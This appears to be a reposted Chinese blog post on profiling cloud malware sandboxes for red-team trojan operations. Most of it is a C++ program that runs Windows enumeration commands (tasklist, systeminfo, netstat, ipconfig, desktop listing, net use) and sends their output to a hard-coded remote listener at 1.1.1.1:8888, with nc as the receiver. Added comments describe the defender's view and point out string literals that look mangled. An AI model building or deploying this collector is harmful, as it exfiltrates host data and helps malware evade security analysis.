已知条件:
云沙箱和情报信息服务之间的关系,这个很重要,毕竟再过几个月HW又会到来,那各位的马儿,是否可以欢快的跑在各大跑马场就是个玄学问题了。
环境准备:
一个服务端,我们使用NC进行替代;
一个客户端,将信息传递出来;
服务端:
NC -l port
客户端:
实现方式以及代码因人而异,大家可以使用自己喜欢的实现语言,充分借鉴互联网大佬的轮子,示例如下:
// 执行命令
// Run `cmd` through the shell and return everything it wrote to stdout.
// Windows-specific (_popen/_pclose, MAX_PATH). Throws std::runtime_error
// when the pipe cannot be created; the child's exit status is discarded.
std::string execCmd(const char* cmd)
{
    std::string output;
    FILE* proc = _popen(cmd, "r");
    if (proc == NULL)
    {
        throw std::runtime_error("_popen() failed!");
    }
    // Read line by line until the child closes its end of the pipe.
    char line[MAX_PATH] = { 0 };
    for (;;)
    {
        if (feof(proc))
            break;
        if (fgets(line, MAX_PATH, proc) == NULL)
            continue;
        output += line;
    }
    _pclose(proc);
    return output;
}
// SOCKET连接
// Entry point of the sample "sandbox information collector": connects to a
// hard-coded listener (1.1.1.1:8888 — the nc side described in the text),
// runs a fixed list of Windows enumeration commands through execCmd, and
// streams each command's raw output over the socket, followed by two marker
// sends. Every path returns 0, including the failure paths, so the exit code
// carries no error information.
//
// Defender's view: the observable pattern is one process spawning tasklist,
// systeminfo, arp, netstat, ipconfig, a `dir` of the desktop and net use in
// quick succession, then opening a single outbound TCP connection that
// carries their output. That child-process chain plus the immediate network
// egress is the detection surface for a sandbox or an EDR.
//
// Unqualified `string` in the body implies a `using namespace std;` outside
// this excerpt. The bare "n" literals and the "\D" in the dir command read
// like a transcription that lost its backslashes (presumably "\n" and "\\"
// in the author's original) — confirm against the source before building.
int main(){
// Request Winsock 2.2; bail out silently if initialization fails.
WORD sockVersion = MAKEWORD(2, 2);
WSAData saData;
if (WSAStartup(sockVersion, &saData)) {
return 0;
}
SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sclient == INVALID_SOCKET) {
printf("INVALID SOCKET");
return 0;
}
// Destination is fixed at compile time; the port matches the `nc -l port`
// listener from the text. The inet_pton result is not checked.
sockaddr_in serAddr = { 0 };
serAddr.sin_family = AF_INET;
serAddr.sin_port = htons(8888);
inet_pton(AF_INET, "1.1.1.1", &serAddr.sin_addr);
if (connect(sclient, (sockaddr *) &serAddr, sizeof serAddr) == SOCKET_ERROR) {
printf("CONNECT ERROR!");
closesocket(sclient);
return 0;
}
// Each block below: run one command, send its output, then send two "n"
// markers as a separator. execCmd throws on _popen failure and nothing here
// catches it, so a failed spawn terminates the program with the socket open.
// tasklist /svc — running processes with their hosted services
string tasklist_result = execCmd("tasklist /svc");
send(sclient, tasklist_result.c_str(), strlen(tasklist_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// systeminfo — OS/hardware summary
string systeminfo_result = execCmd("systeminfo");
send(sclient, systeminfo_result.c_str(), strlen(systeminfo_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// arp -a — ARP cache
string arp_result = execCmd("arp -a");
send(sclient, arp_result.c_str(), strlen(arp_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// netstat -ano — connections with owning PIDs (note the trailing space in the literal)
string netstat_result = execCmd("netstat -ano ");
send(sclient, netstat_result.c_str(), strlen(netstat_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// ipconfig /all — full adapter configuration
string ipconfig_result = execCmd("ipconfig /all");
send(sclient, ipconfig_result.c_str(), strlen(ipconfig_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// Desktop directory listing of the current user
string desktop_result = execCmd("dir %USERPROFILE%\DESKTOP");
send(sclient, desktop_result.c_str(), strlen(desktop_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// net use — mapped network drives / SMB sessions
string NETUSE_result = execCmd("net use");
send(sclient, NETUSE_result.c_str(), strlen(NETUSE_result.c_str()), 0);
send(sclient, "n", strlen("n"), 0);
send(sclient, "n", strlen("n"), 0);
// Orderly teardown of the socket and Winsock.
closesocket(sclient);
WSACleanup();
return 0;
}
验证:
参考资料:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://bbs.kafan.cn/thread-2082898-1-1.html
本文来源于互联网:对云沙箱分析的一种反制技术-沙箱信息获取